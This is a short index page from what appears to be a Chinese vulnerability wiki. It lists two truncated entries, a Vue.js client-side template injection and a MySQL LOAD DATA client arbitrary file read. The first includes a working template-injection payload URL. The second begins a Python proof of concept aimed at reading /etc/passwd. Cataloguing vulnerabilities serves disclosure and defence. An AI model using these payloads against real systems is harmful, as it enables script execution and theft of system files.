Vue.js Javascript library客户端模板注入漏洞 免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , POC http://host/?name={{this.constructor.constructor('alert("foo")')()}} 免费、自由、人人可编辑的漏洞库- ... 阅读全文
Mysql LOAD DATA 客户端任意文件读取漏洞 免费、自由、人人可编辑的漏洞库 , POC1 #!/usr/bin/python #coding: utf8 import socket # linux : #filestring = "/etc/passwd" # windows: #f ... 阅读全文